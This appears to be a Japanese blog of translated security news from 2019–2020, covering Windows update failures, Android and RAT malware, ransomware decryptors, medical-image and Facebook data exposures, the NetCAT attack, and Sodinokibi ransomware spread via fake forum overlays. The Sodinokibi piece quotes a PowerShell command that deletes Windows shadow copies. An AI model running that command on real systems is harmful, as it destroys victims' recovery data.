    Microsoftは、KB4579311累積アップデートを、2020年10月13日にリリースした。それ以来、ユーザは、このアップデートでインストール、クラッシュ、パフォーマンスに関する問題とブート問題が起きていると報告し続けている。
     Windows 10で稼働しているハードウェアとドライバーは様々であるため、新しい累積アップデートがリリースされると常に問題が発生するが、今回の問題では、明らかに通報が増加している。
     そういうことで、私は多くのコンピュータにKB4579311累積アップデートをインストールしてみた。そして、唯一、以下に説明するExplorerのクラッシュを経験した。

    ユーザが報告していること

     KB4579311累積アップデートのリリースで、ユーザが経験した問題の数に顕著な増加がある。
    人々が、このアップデートをインストールした後に経験している幾つかの問題の概要を以下に示す。

    KB4579311累積アップデートをインストールできない

     ユーザがWindows 10 KB4579311累積アップデートで遭遇する最も一般的な問題は、そもそも、このアップデートをインストールすることができないということである。
     Feedback Hubの簡単なレビューとMicrosoftのフォーラムへの投稿は、ユーザが、このアップデートをインストールしようとした時、0x800f081f, 0x8007000d, 0x800f0988他のようなエラーコードを受け取ったと多くのユーザは通知している。

    Feedback Hubのレポート(画像をクリックすると拡大します)

     Redditの他のユーザもまた、インストレーションルーチンがあるパーセンテージに達すると、動かなくなると通知している。結局長い間待たされた後に、このアップデートは続行される。
     残念ながら、影響を受けた多くのユーザは、sfc /scannow, アンチウィルススキャン, ドライバアップデートなどのような標準的なWindows Updateトラブルシューティング タスクは役に立たないと述べている。
     Bleeping Computerが発見した、このアップデート問題を上手くバイパスする一つの方法は、Windows 10 Media Creation Toolを使用するインプレース アップグレードを実行することである。(【訳注】 過去、Media Creation Toolを使用してのインプレースアップグレードは多大な時間がかかることが報告されています。ただ、累積アップデートがリリースされる度にMedia Creation Toolもアップデートされますので、この累積アップデートでトラブルに遭遇した方は、一度お試し下さい)

    ブート問題、Explorerのクラッシュ、パフォーマンスの問題

    最後に、一部のユーザは、ブート問題、パフォーマンス問題、奇妙なデスクトップ問題を経験している。
    残念ながら、ブート問題とクラッシュは、Windows Updateで体験する当たり前のことである。一部のユーザは、ログインした後、デスクトップが表示される前に、Explorerが何度も起動と終了を繰り返したと述べている。
     「私は、Windows Update KB4579311で問題に遭遇した。インストールすると、最終的にログインするまで、Explorerが繰り返しクラッシュする。ログインすると、通常通り使用することができる、しかし、クラッシュすると、ログインと全てをロードするのに要する時間が増加する。大変迷惑である」と、あるユーザはレポートしている。
     一部のユーザでは、これらのExplorerのクラッシュは、自動的に解決されず、代わりに、Windowsが応答しなくなる。
     最後に、一部のユーザは、パフォーマンス問題(Windowsの動作が緩慢になる、応答しなくなる、あるいは、ゲームはもはや動作しない)をレポートしている。
     この問題を解決するには、以下の手順を実行することをユーザに推奨する:

      1. KB4579311アップデートをアンインストールする。ここでアップデートのアンインストールについて詳細に学習することができる。
      2. このアップデートをアンインストールしたら、グラフィック、オーディオ ドライバ、Intelドライバ、可能ならストレージドライバをアップデートする。Intel GPUを使用している場合は、グラフィックス ドライバを試すことができる。グラフィックス ドライバは、OEMデバイスに関しては現在、例外なくインストールすることができる。
      3. 全てのドライバーが最新バージョンにアップデートされたら、KB4579311アップデートを再インストールする。
      4. うまくいけば、デバイスドライバを更新することで問題は解決するだろう。


    気をつけろ! このAndroidマルウェアは工場出荷状態に戻しても削除することができない
    Fossbytes : News(2019/10/30)
     Malwarebytesは、今までに45,000のAndroidデバイスに感染した新しいマルウェア株を特定した。xHelperと名付けられたこのマルウェアは、未だ7ヶ月しか経っていないが、8月の1ヶ月で既にMalwarebytesのマルウェアのTop 10リストの仲間入りを果たしている。セキュリティ研究者によると、このマルウェアは、自分自身を偽装し、あらゆる種類のアンチウィルスを回避するための最も効果的な方法の一つを身に付けている。

    アプリケーションのサイドローディングを可能にしているWebサイトによって拡散している

     Symantecは、このAndroidマルウェアが、ユーザのデバイス上のアプリケーションをサイドロード(【訳注】 新しいデバイスでサポートされなくなってしまったアプリをインストールしたい場合、Google Play経由ではなくPCからマニュアル操作でアプリをデバイスにインストールする方法(lifehackerより))することを可能にしているWebサイトによって押し付けられると明らかにしている。ユーザがサードパーティのWebサイトからアプリケーションをインストールすると、xHelperトロイは、ターゲットのスマートフォンにインストールされる。
     インストールされると、このトロイは、頻繁にポップアップと通知を表示するようの動作する。SymantecとMalwarebytesの双方が実施した調査によると、xHelperマルウェアは、感染者の個人情報を損失させる可能性のある悪意ある挙動は行なわない。
     このマルウェアは、感染者にゲームをしたり、他のアプリケーションをダウンロードしたりするように促してくる。このマルウェアの背後にいるグループは、広告をクリックさせたり、他のアプリケーションをインストールさせたりすることで金銭を得ようとしている。

    工場出荷状態に戻しても削除できない

     このマルウェアの最も興味をそそることの一つは、その背後にいる悪の行動主体が、スマートフォンからこのマルウェアを削除することが不可能に近いことを保証していることである。このマルウェアは、暗号化を使用して自分自身を難読化している。Malwarebytesによると、xHelperアプリケーションには、セミステルスとフルステルスの二つの変種がある。両方の変種共、アプリケーションアイコンを作成しない。これは通常のユーザが発見することをより困難にしている。アイコンやショートカットがないことは、あなたが、この頻繁に通知を発生させるアプリケーションをアンインストールできないことを意味している。
     このマルウェアに気がつく唯一の方法は、このマルウェアがセミステルス・モードで稼働している時に表示される通知アイコンである。フルステルス・モードでは、感染者のデバイスで、このマルウェアを検出する唯一の手段であるこの通知を表示することさえしない。

    xHelperは、デバイスの起動。ネットワーク接続のような特定のアクションが呼び出された時に自動的に稼働するようにコーディングされている。一旦、フォアグラウンドサービス(【訳注】 通常のサービスと違い、通知を表示し、バックグラウンドで実行している事をユーザに認識させた状態で実行するもの(Qiitaより))として処理が開始されると、このマルウェアは、xHelperトロイを抱き合わせていたアプリケーションを削除しても、このマルウェアを削除することはできない。
     Symantecの研究者は、工場出荷状態に戻しても、あるいは、ユーザがこのサービスを手動で停止することを決定した後でさえ、このマルウェアがどのようにしてデバイス上に残るのかを未だ発見できていない。

    サイドローディング・アプリケーションを回避せよ

     このマルウェアがデバイスに感染すると削除する方法が存在していないので、アプリケーションのサイドローディングを許可しているWebサイトを回避することが適切である。また、インターネットの閲覧中にリダイレクトされるリンクに注意しなさい。デバイスを安全に保つために、怪しいポップアップをクリックしないようにしなさい。


    Yatron, WannaCryFake, FortuneCrypt身代金要求型マルウェア用の復号プログラムがリリースされた
    BleepingComputer : News>Security(2019/09/25)
     セキュリティ企業が、3つの身代金要求型マルウェア感染用の復号プログラムをリリースした。これらの身代金要求型マルウェアの犠牲者は、無料で感染者のファイルを復号することができる。これらの復号プログラムは、WannaCryFake, Yatron, FortuneCrypt身代金要求型マルウェア感染用である。
     これらの身代金要求型マルウェアの亜種のオンライン上での活動は殆ど見られていないが、たとえ一人のユーザであろうともファイルを無料で取り戻すことができたら、それは勝利である。

    EmsisoftがWannaCryFakeの復号プログラムをリリースした

     Emsisoftは、WannaCry Fake身代金要求型マルウェア用の復号プログラムをリリースした。この身代金要求型マルウェアは、暗号化したファイルに .wannacry 拡張子を付けることによって悪名高いWannaCryに便乗しようとした。

     「WannaCryFakeは、犠牲者のファイルの暗号化にAES-256を使用する身代金要求型マルウェア株である。WannaCryFakeによって暗号化されたファイルは、ファイル拡張子 “.[][recoverydata54@protonmail.com].WannaCry” を付けられる」

     感染させられたユーザは、以下のような脅迫文を見ることになる。

    WannaCryFakeの脅迫文(画像をクリックすると拡大します)

     あなたが、この身代金要求型マルウェアによって暗号化されたのであれば、この復号プログラムをダウンロードし、ファイルを無料で復号することができる。

    KasperskyがYatronとFortuneCrypt用の復号プログラムをリリースした

     Kasperskyは本日、YatronとFortuneCrypt身代金要求型マルウェアの復号プログラム(暗号化アルゴリズムの弱点を利用)をリリースした。
     我々は、Yatronに関しては、彼らがRansomware-as-a-Service(RaaS、【訳注】 不正プログラムのランサムウェアを「サービス」として提供するもので、この「サービスの利用者」は、この RaaS を使って、新たなランサムウェアを簡単に作成することができる(Trendmicroセキュリティブログより))の宣伝を始めた時に取り上げている。この身代金要求型マルウェアに感染した者は、暗号化ファイルに .Yatron拡張子を付けられている。

    Yatronで暗号化されたファイル(画像をクリックすると拡大します)

     この身代金要求型マルウェアはHiddenTear(暗号化に弱点があることが知られている)を元にしているので、Kasperskyは、それ用の復号プログラムを作成できると宣言していた。Kasperskyによると、この身代金要求型マルウェアの殆どの犠牲者は、ドイツ、中国、ロシア連邦、インド、ミャンマーである。

     「この身代金要求型マルウェアの作者は、上述した最初のシナリオを選択し、オープンソースの身代金要求型マルウェアのサンプルとして著名なHiddenTearで使用されているコードの『創作物』に基づいている。我々の統計によると、昨年だけでも、ドイツ、中国、ロシア連邦、インド、ミャンマーで記録された、Trojan-Ransom.MSIL.Tearの様々な変種による600を超える感染を防御した。」

     Kasperskyはまた、大部分がロシア連邦、ブラジル、ドイツ、韓国、イランを標的にしたFortuneCrypt身代金要求型マルウェア用の復号プログラムをリリースした。

     「昨年の間、我々の製品は、悪意あるTrojan-Ransom.Win32.Cryprenファミリー(FortuneCryptは、このファミリーの一つである)の多くの変種によって実行された6000を超える攻撃を記録した。このマルウェアによって攻撃されたトップ5の国々は、ロシア連邦、ブラジル、ドイツ、韓国、イランである。」

     この身代金要求型マルウェアは、暗号化されたファイル名に拡張子を付けないので、犠牲者が最初に警告されるのは、以下に示す脅迫文を見た時である。

    FortuneCrypt(画像をクリックすると拡大します)

     あなたが、YatronもしくはFortuneCrypt身代金要求型マルウェアに感染させられているのであれば、Kasperskyの復号プログラムを彼らのサイトから直接もしくは、No More Ransomダウンロードすることができる


    4億の医用放射線画像がインターネット上に晒されている
    BleepingComputer : News>Security(2019/09/18)

     パブリックWebに晒されていた医用画像保管システムの解析は、52カ国のおよそ600のサーバが、不正アクセスに対し全く保護されていなかったことを明らかにした。
     監査されたシステムは、数千の脆弱性に対してパッチが当てられていなかった。これらの脆弱性の内500を超えるものは、最高ランクの緊急度スコアだった。

    多大で気にかかる数字

     ドイツに本拠を置く脆弱性解析とマネージメント企業であるGreenbone Networksは、パブリック インターネットに接続されている2300のPicture Archiving and Communication System (PACS、【訳注】 正確に定義された日本語はないが「医用画像保管電送システム」と呼ばれる(東海大学大磯病院・医学豆知識より)) システムを検証し、極秘情報の公開という重大な問題を発見した。
     PACSは、医療分野で使用され、X-Ray, CT, MRIのような画像診断デバイスから取得された医用情報を保管し提供するものである。医用画像データは、送信、保管、取得、印刷、処理、表示するためにDICOM(ダイコム、Digital Imaging and Communications in Medicine)標準規格が使用される。
     7月中旬から9月初旬の間パブリックデバイス検出エンジンを使用して、Greenbone Networksは、インターネットを介して接続可能な590のPACSサーバを特定し、2430万の患者の記録を取得することが可能であった。
     殆どの記録は、以下の個人情報と医用情報の詳細を含んでいた:

    ・ 姓名
    ・ 誕生日
    ・ 検査日
    ・ 検査範囲
    ・ 画像検査法の種類
    ・ 主治医
    ・ 研究所/クリニック
    ・ 生成された画像の数

     攻撃者は、最終目標としての金銭の見返りのある、より効果的なソーシャルエンジニアリングとフィッシング攻撃を配備するために、この情報を使用することができる。
     この研究者達は、世界中のオープンPACSサーバからデータを引き出すためにRadiAnt DICOM Viewerをセットアップした。7億3350万画像の中から、3億9950万画像がダウンロードでき閲覧できた。
     ヨーロッパでは、イタリアが影響を受けるシステム 10 の最高数を記録していると共に、リークされている医療情報の最高数も記録している。

     北米で最も懸念される保護されていないPACSは米国である。
     米国はまた、晒されているデータセットの最高数(1370万)、それに付随する医用画像の最高数(3億を超える)と晒されているマシンの最高数(187)を記録している。

     南アメリカでは、ブラジルが突出しており、64万データセット、3110万画像、34のリークサーバが検出されている。

     アジアでは、オープンマシンの最高数はインドだが、トルコはデータレコードの数(490万)と、それに付随する医用画像数(1億7900万)での突出が懸念される。
     インドは、保護されていないPACSが凡そ100あり、1億500万の画像の付随する62万7000レコードが晒されている。

    1万超の同定された脆弱性

     このレポートは、監査対象のシステムが、1万を超えるセキュリティ問題(20%が緊急度 高 とラベルされている)に直面していることを明らかにしている。
     それらのうちの500は、Common Vulnerability Scoring System (CVSS、共通脆弱性評価システム)で最高ランク(10段階評価の10)に必要な条件を全て満たしている。
     研究者達は、同定された脆弱性の一部が、数年前のものであると指摘しているが、公開されたレポートでは更なる詳細は提供されていない。承認された組織にあっては、300MBの大きなバージョンが利用できる。

     このような問題の他に、この監視システムは、45のPACSが、DICOMの代わりにHTTPやFTPのような危険なプロトコルを介してデータを提供していたことを発見している。即ち、それらに保管されているデータは、認証なしにアクセスすることができる。
     これらの一つは、ディレクトリ一覧で利用できるDICOMアーカイブ ファイルを持っていたので、Webブラウザ経由で誰もがアクセスすることが可能であった。
     この種のデータが晒されていたことに伴うリスクは明らかである。 最も明白なのは、標的型攻撃、恐喝の企て、さらには医療や健康保険の詐欺のために医療情報を盗むことである。
     米国保健福祉省(HHS)の4月のレポートでは、ダークWeb上の健康記録の平均的な金額は、250USDであるが、1,000USDになる可能性もあるので、サイバー犯罪者はこの種の情報に間違いなく関心を持っているとしている。


    InnfiRATマルウェアはLitecoinとBitcoinのウォレット情報を盗める
    BleepingComputer : News>Security(2019/09/14)
     InnfiRATと名付けられたリモートアクセス・トロイの木馬(RAT)は、暗号化通貨のウォレットデータを含む機密情報を盗む幅広い能力が備わっている。ZscalerのThreatLabZチームは、その内部動作を詳細に調査したが、このマルウェアは暫く前からオンライン上に存在している。
     初期のこのRATは、セキュリティ研究者James_inthe_boxによると、2017年11月に見つけられたが、真面目に解析されたのは、これが最初である。
     InnfiRATは、ThreatLabZチームが発見した .NETマルウェアであり、anti-VMとプロセスチェック(通常はマルウェア解析に使用され、マルウェアがSandbox化された環境で実行されている時にマルウェアの検出を支援するように設計されている)を搭載している。
     ターゲットのコンピュータに感染すると、InnfiRATは、それ自身を%AppData%/NvidiaDriver.exeにコピーし、メモリ中のBase64でエンコードされたPEファイルに書き込む。このファイルは、このマルウェアの実際の機能を備えた他の .NETバイナリに復号される。

    永続性と分析防止手段

     このRATは、Sandbox中で稼働していることを発見されると、それ自体を自動的に終了する。そうでなければ、セキュリティ侵害したマシンのHWID(【訳注】 ハードウェアID、Windowsを使用して、INFファイルをデバイスに一致するベンダ定義の識別文字列(Microsoft Docsより))と、国名を収集する。
     InnfiRATはまた、Process Hacker, Process Explorer, Process Monitorのようなプロセスを監視するために使用されるツールのプロセスを発見すると、それ自体を終了する。
     幾つかのWebブラウザのプロセス(即ち、Chrome, Yandex, Kometa, Amigo, Torch, Orbitum, Opera, Mozilla)も数え上げられる。これらのプロセスは、発見されると直ちにKillされ、収穫を容易にするためにユーザプロファイルをアンロックする可能性がある。
     このマルウェアはまた、このRATが発見されKillされた場合に備えて、悪意ある %AppData%/NvidiaDriver.exe 実行ファイルを毎日実行するスケジュールタスクを作成している。

    特定のプロセスをチェックしている(画像をクリックすると拡大します)

    暗号化通貨とクッキーを盗む

     InnfiRATのコマンド・アンド・コントロール(C2)サーバーは、11種類のコマンドを送信することができるが、最も興味を惹くものは、BitcoinとLitecoinのウォレットデータ並びに、偵察段階でKillしたWebブラウザからクッキー情報を検索し盗むものである。
     このRATは、%AppData%\Litecoin\ と %AppData%\Bitcoin\ フォルダ中でwallet.datファイルを検索する。発見されると直ちに収集され、このマルウェアのC2サーバに伝えられる。
     「InnfiRATは、格納されているユーザ名とパスワードを盗むためにブラウザのクッキー並びに、機密データを取り込む。更に、このRATは、スクリーンショットの機能を持っているので、開いているウィンドウから情報を取得できる」ことを、Zscaler ThreatLabZチームは発見している。
     「InnfiRATは、収集したデータを、そのC2サーバーに送信し、さらなる指示を要求する。C&Cはまた、感染したシステムに追加のペイロードをダウンロードするようにマルウェアに指示する。」

    Bitcoinウォレットデータを検索している(画像をクリックすると拡大します)

     2,097,152バイト未満のテキストドキュメントもまた、それらが犠牲者のデスクトップに保存されていた場合には、このマルウェアによって収集され、そのC2サーバに格納されている同じ山のような流出データに対して送信される。
     InnfiRATのオペレータは、既に上述したコマンドに加え、以下のコマンドを送信することもできる。

    ・ SendUrlAndExecute(string URL) - 指定されたURLからファイルをダウンロードし、それを実行する
    ・ ProfileInfo() - ネットワーク、ロケーション、ハードウェア情報を収集し漏洩する
    ・ LoadLogs() - ファイルを指定のファイルに記述する
    ・ LoadProcesses() - 実行されているプロセスのリストを取得し、それをC2サーバに送信する
    ・ Kill(int process) - 犠牲者のマシン上の特定のプロセスをKillするためのコマンド
    ・ RunCommand(string command) - 犠牲者のマシン上でコマンドを実行する
    ・ ClearCooks() - 特定のブラウザのブラウザクッキーを消去する

     このRATをドロップするために使用されたマルウェアサンプルハッシュとドメインとC2サーバを含む痕跡情報(Indicators of compromise、IOC)は、ThreatLabZチームのInnfiRATの書き込みの末尾で得られる。
     先月、二つの新しいRATがセキュリティ研究者によって発見された。一つは、このRATを発見したESETの研究者によってBalkanRATと名付けられ、RATペイロードを使用した金融に関心を持つ脅威の主体によって実行された作戦の一部として幾つかの国々をターゲットにしたものである。
     他のLookBackと呼ばれるドキュメント化されていないRATは、Proofpoint Threat Insight Teamによって発見され、公益事業部門の3つの米国の組織をターゲットにしたスピア-フィッシング(【訳注】 詐欺行為をけしかける対象に合わせて手口をカスタマイズする詐欺(Weblioより))キャンペーンを介し拡散している。


    新しいNetCAT攻撃は、IntelのCPUから極秘データをリークすることができる
    BleepingComputer : News>Security(2019/09/11)
     NetCAT(Network Cache ATtack)と名付けられた脆弱性は、2012年以降のIntelの全てのサーバーグレード プロセッサに影響を与え、このネットワークを介してサイドチャンネル攻撃を仕掛けることで極秘データをスニッフィング(【訳注】 ネットワーク上のデータを傍受すること)することができる。
     アムステルダム自由大学のVUSecグループの研究者は、その情報がIntelのData Direct I/O (DDIO、【訳注】 処理速度向上と消費電力削減を実現する技術)が有効になっているシステムのCPUキャッシュに存在していることを発見した。

    DDIOは、Intelのサーバーグレード プロセッサ特有のものであり、2012年以降のIntel Xeon E5, E7, SPファミリーではDefaultでONになっている。
     この目的は、ネットワークデバイスや周辺機器とCPUキャッシュを共有し、高速ネットワーク中のサーバアプリケーションのパフォーマンスを向上させるためである。
     NetCATは、リモートマシンのCPUのLast-Level Cache(【訳注】 CPUから見て一番遠いキャッシュメモリのこと(Wikipediaより))中のデータを推測するために配備される。VUSecの研究者は、ネットワーク上のマシンを制御している攻撃者が、ターゲット上で悪意あるソフトウェアを実行することなく、SSHセッションから機密データを推測するためにこの方法を使用できることを示した。

    攻撃のトポロジー

     「より正確には、NetCATで、我々は、リモートキャッシュ サイドチャンネルを使用してSSHセッションから個別のネットワークパケットの到着時刻をリークすることができる。」 DDIO中のキー プロパティをリバースエンジニアリングすることで、この研究者は、このキャッシュが共有されている方法を学習した。この知識と、ネットワークカードや他のサーバーサイド周辺機器をスパイすることで、ネットワーク上のクライアントがサーバに接続するために SSHを使用した時、彼らがCPUキャッシュ中のアクセス時刻を監視することが可能になる。
     本日の投稿で、VUSecは、対話型のSSHキーでは、ネットワークパケットはキーを押す度に送信されると説明している。NetCATで、攻撃者は暗号化されたSSHセッションの内部でタイプされた文字を推測することができる。
    これは、文字に対応するネットワークパケットの到着時刻を監視することによって可能である。研究者は、人々が特定のタイピング パターンを持っていることと、これが解析の役に立つという事実も活用している。

     「例えば、'a'の直後に's'をタイプすることは、's'をタイプした後に'g'をタイプするより高速である。NetCATは、あなたがプライベートSSHセッション中でタイプしたことをリークするために、キーストローク タイミング攻撃として知られるパケットの到着時間間隔の統計分析を実行することができる。」

     データのタイプを決定するために、研究者は時間をキーストロークにマップするために機械学習(【訳注】 データから反復的に学習を行い、パターンや特徴を見つけ出して未知のデータに対して予測を行う技術(Classmethodより))を始めた。
     研究の詳細は、論文"NetCAT: Practical Cache Attacks from the Network"で利用できる。
     これらの攻撃のデモンストレーションは、SSHセッションからのキーストロークが遠隔でリークできる方法を示している。

     Intelはこの問題を認識しており、この問題は、CVE-2019-11184として追跡される。公開と技術的詳細に関する報奨金が授与された。
     Intelは、Intel DDIOとRDMA(Remote Direct Memory Access)が有効になっているセキュリティで保護されたネットワークでは、強力なセキュリティコントロールを推奨している。この警告にも拘わらず、この脆弱性のCVSS基本値は2.6/10と低い値になっている。
    追加の推奨事項は、信頼できないネットワークからの直接アクセスを制限することと、「一定時間型コードを使用するような、時間間隔攻撃に抵抗力のあるソフトウェアモジュール」を使用することである。
     そうは言うものの、NetCATは、最初のネットワークベースのCPUサイドチャンネル攻撃として歴史に刻まれるだろう。


    数億のFacebookユーザの電話番号がインターネット上に放置されていたことが発見された
    Tripwier : The State of Security(2019/09/05)
     TechChurchは、セキュリティ研究者がFacebookユーザに関連する総数4億1900万を超えるレコードが付属するデータベースを含むサーバが晒されていることを偶然に発見したとレポートしている。
     TechChurchのレポートによると、各データベースのレコードは、ユーザの一意のFacebookアカウントID(ユーザ名を特定することが可能)と、其のアカウントに付随する電話番号を含んでいる。このデータの宝庫には、米国が拠点のFacebookユーザの1億3300万レコード、英国Facebookユーザから1800万レコード、ベトナムFacebookユーザからの5000万レコードが含まれている。
     最悪なのは、サーバー上にパスワードプロテクションが存在していないので、文字通りインターネット接続できる誰もが極秘情報にアクセスすることができたことである。

    晒されていたデータベースの一部(画像をクリックすると拡大します)

     ハッカーがデータを収集するためにFacebookをセキュリティ侵害したとするものは誰もいない。更に、晒されていたデータベースはFacebook自体によって使用されているサーバ上には発見されていない。しかし、おそらく、このデータは、おそらくFacebookアカウントに接続するアプリケーションを作成したサードパーティーが、数百万のFacebookユーザプロファイルから抽出したものである。このデータスクレイピングは、間違いなく何が発生しているのか認識していないユーザや、許可されていることの意味を理解していないユーザの役に立っていた。  Facebookのスポークスマンによると、晒されていたデータは、Facebookがユーザの電話番号へのアクセスを制限する前に収集されたものである。

     このデータセットは古いものであり、昨年、我々が、電話番号を使用して誰かが他人を特定する機能を削除するように変更する前に取得された情報のようである。このデータセットは削除された。そして、我々はFacebookアカウントがセキュリティ侵害されたという証拠を何ら確認していない。

     しかしながら、データが初めに数年前に収集されとする発言は的はずれである。人々が数年間同じ電話番号を持ち続けることは珍しいことではない。そして、Facebookのようなオンライン企業が、過去にデータの予防手段が不十分であったのなら、現在及び今後数年、依然として潜在的な問題が存在する。
     犯罪者が電話番号を知ると、彼らはあらゆる種類の損害を与えることができる:
      ・ 犯罪者は、あなたがにフィッシングサイトに導いたり、マルウェアにさえ導く不要なメッセージをスパムできる。
      ・ 犯罪者は、あなたが顧客である企業(例えば、携帯電話事業者のような)であることを装って電話することができる。
      ・ あなたが取り分け価値のあるターゲットであるのなら、そうと決めたハッカーは、あなたのスマートフォンをスパイウェアで感染させたり、あるいはデータを盗むために未パッチの脆弱性をセキュリティ侵害しようとするかもしれない。
      ・ 犯罪者は、一般にSIMスワップ攻撃と呼ばれるものを介して、携帯電話事業者を欺き、番号の所有権を付与するように試みることができる。 番号がハイジャックされると、犯罪者は携帯電話番号に関連付けられた被害者のオンラインアカウントのパスワードをリセットすることができる。
      ・ 他にも沢山...
     特定の個人の携帯電話番号の決定が可能なことは、詐欺師やハッカーにとっては情報の貴重な部分である。そして、数百万の携帯番号のデータベースは、明らかに犯罪者の一部にとっては関心事である。
     これはトラブル続きのFacebookに関連するセキュリティとプライバシーへの懸念に関する一つの新事実である。この企業は否定的な見出しから自分自身を守ることができないようである。
     Cambridge Analyticaの大失敗のような幾つかの事実は、メディア、規制当局、政府中に同様に懸念を引き起こす。これは、最早忘れられているかのような、5億を超えるFacebookのレコードがサードパーティーの開発者のずさんなセキュリティに起因して、インターネット上に晒されたまま(パスワード無し)だった今年初めのインシデントと同じである。
     Mark Zuckerbergは、今年初め「未来はプライベートなものになるはずです」と発言し、Facebookは、よりプライバシーに重点を置くことに全力を捧げると主張した。この声明は、ネットワークの大雑把な歴史を考慮し、私自身(GRAHAM CLULEY)を含むオブザーバによって懐疑的に扱われた。
     答えられていない質問が残っている: 「未来はプライベートなものになるはずです」というFacebookの主張が、信じられるか否かにかかわらず、Facebookが既に行われた損害を修復するのは、実際にはあまりに遅すぎるのだろうか?


    身代金要求型マルウェアSodinokibiは、ハッキングしたサイトのインチキフォーラムを介して拡散している
    BleepingComputer : News>Security(2019/09/02)
     Sodinokibi身代金要求型マルウェアの拡散者は、WordPressサイトをハッキングし、オリジナルのサイトのコンテンツの上に、インチキのQ&Aフォーラムへの投稿を表示するJavaScriptを挿入している。このインチキの投稿は、サイトの"admin"からの"Answer"を含んでいる。そして、この"Answer"には、身代金要求型マルウェアのインストーラへのリンクを含んでいる。
     セキュリティソフトウェアと人々が、身代金要求型マルウェアとマルウェアを拡散するために使用される方法を認識するようになると、この攻撃で利益を上げている者共は、犠牲者に感染するための巧妙な方法を考案する必要がでてくる。
     このことは、ハックしたサイトのコンテンツの上にインチキのQuestions and Answersフォーラムを被せる新しい拡散方法にも当てはまる。このインチキのフォーラムの投稿は、ユーザが訪問するであろうページのコンテンツに関連する情報を含んでいるので、admin(管理者)によって提供される答えとリンクは正当なものであるかのように見える。
     しかしながら、実際には、このダウンロードされたファイルは、Sodinokibiもしくは、REvil身代金要求型マルウェアでユーザに感染する。

    インチキのQ&Aを被せる攻撃の動作方法

     BleepingComputerは、複数の犠牲者がこの方法で感染させられたことを確認したAuraによって、この新しい攻撃方法を最初に警告された。以下に、我々は、この攻撃の動作方法と、Sodinokibiもしくは、REvil身代金要求型マルウェアをインストールするプロセスの全般的な概要を提供する。
     以前のEITest Chrome HoeflerText Font Update攻撃に似て、この攻撃で利益を上げている者共は、サイトをハッキングし、以下に示すようにJavaScriptをそのHTML中に挿入する。挿入されたURLは、全ての訪問者でアクティベートされるが、初めての訪問者や、そのサイトに一定時間行っていないユーザは、そのデータが含まれるだけである。

    被せて挿入されたJavaScript(画像をクリックすると拡大します)

     初めてこのサイトを訪問した時、このスクリプトは、下に示すようにコンテンツの上に被せてインチキのQuestions and Answersフォーラムへの投稿をフランス語で発生させる。

    インチキのQuestions and Answers Forumへの投稿(画像をクリックすると拡大します)

     ユーザにとって、このフォーラム投稿の内容は、インチキではあるものの通常のサイトのように見える(上図)が、ハッキングされたページの内容に関連しているものであり、実際にはスクリプトによって作成され被されたものである。
     ユーザがもう一度そのページをリフレッシュしても、このスクリプトは発動せず、通常のページが表示される(この記事の末尾にあるデモビデオ参照)。
     ユーザがこのページをリフレッシュしない場合は、他の訪問者がコピー機の「契約の終了」の雛形について、このサイトにフランス語で質問を投稿したかのように見える。

     "Hello, I am looking to download letter of termination contract photocopier model. A friend told me he was on your forum. Can you help me?"

     こんにちは、コピー機契約の終了に関する通知書の雛形をダウンロードしたいと思っている。友人は、あなたのフォーラムにあったと私に告げた。手伝ってもらえますか?

     質問に対する回答で、インチキの回答が、Adminによって提供され、要求されている契約への直リンクが提供される。

     "Here is a direct download link, model letter of termination contract photocopier."

     こちらが、コピー機契約終了の通知書の雛形へのダウンロード直リンクです。

     ユーザが、このリンクをクリックすると、攻撃者の支配下にある任意のハッキングされたサイトから、ZIPファイルがダウンロードされる。この特定の例においては、このファイルは、"modele_de_lettre_de_resiliation_contrat_photocopieur.zip"と名付けられており、解凍すると同じ名前のJScriptファイルが含まれている。

    JScriptインストーラ(画像をクリックすると拡大します)

     このJScriptは、リモートサーバに接続する難読化されたコードを含んでいる。そして、このサーバは大量のデータで答えてくるだろう。

    キャプション(画像をクリックすると拡大します)

     このデータは、かなり時間がかかるが復号され、%UserProfile%フォルダにGIFファイルとして保存される。このファイルは、多少難読化されたPowerShellコマンドが含まれている。そしてこれは、ReadAllText.Replace関数を使用して、そのファイルから、あらゆる ~ 文字を削除することでクリーンにされる。

    PowerShellコマンドから ~ 文字を削除

     これは、結果としてクリーンなPowerShellコマンドになるが、次に、コンピュータを暗号化するためのSodinokibi DLLを実行するために使用される。

    難読化を解除されたGIFファイル(画像をクリックすると拡大します)

     暗号化プロセスの間に、この攻撃者は、以下のPowerShellコマンドを使用してシャドーボリュームコピーを除去する。

    Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

     終了すると、この犠牲者のファイルは暗号化され、脅迫文が、復号プログラムを購入する方法に関する情報を含むTor支払いサイトに犠牲者を導く。

    Sodinokibi Tor支払いサイト(画像をクリックすると拡大します)

     このような攻撃から自分自身を保護するには、必ずリアルタイムプロテクション付きの何らかのセキュリティソフトウェアをインストールすることと、末尾に .js 拡張子のある実行ファイルを決して実行しないことである。
     このような被せられたインチキフォーラムの動作方法を確認したい人々のために、BleepingComputerは、デモンストレーションビデオを作成した。


    Foxitユーザパスワードの漏洩を含むデータ侵害を公開
    BleepingComputer : News>Security(2019/08/30)
     PDFソフトウェアを提供しているFoxit Softwareは、顧客名や企業名、e-Mail、電話番号、パスワードを含む'My Account'サービスユーザの個人情報特定データに、サードパーティーがアクセス可能な最近のセキュリティ侵害について本日公開した。
     Foxitは2001年に創立以来200を超える国々から10万を超える顧客に、このソフトウェアを販売してきたが、この会社が今月公開したプレスリリースによると、現在は世界中に5億2500万ユーザを抱えている。
     「Foxitは、最近彼らのデータシステムに不正アクセスが実行されたと判断した。サードパーティーは、Foxitの'My Account'ユーザデータへのアクセスを獲得した。このユーザデータは、e-Mailアドレス、パスワード、ユーザ名、電話番号、企業名、IPアドレスを含んでいる」と、本日この企業によって公開されたアドバイザリは述べている。

    支払い情報は漏洩されていいない

     Foxitによると、無料のメンバーシップ'My Account'サービスは、その顧客に「使用版ソフトウェアのダウンロード、注文履歴、製品登録情報、トラブルシューティングとサポート情報」を提供している。
     しかしながら、セキュリティ侵害されたシステムは、支払いあるいはクレジットカードデータを格納していないので、影響を受けるユーザ全てに関して、支払い情報は、このデータ漏洩インシデントでは漏洩していない。

     このシステムは、ユーザ名、e-Mailアドレス、企業名、IPアドレス、電話番号は保持しているが、他の個人特定データや支払いカードの情報は保持していない。Foxitは、そのシステムに顧客のクレジットカード情報を保持していない。

     この会社はまた、影響を受ける'My Account'ユーザは、e-Mailを介して、このインシデントに関して警告されたと発言している。このe-Mailは、現在漏洩しているリスクの全てに関して彼らに通知するものであり、パスワード再設定フォームへのリンクを含んでいる。

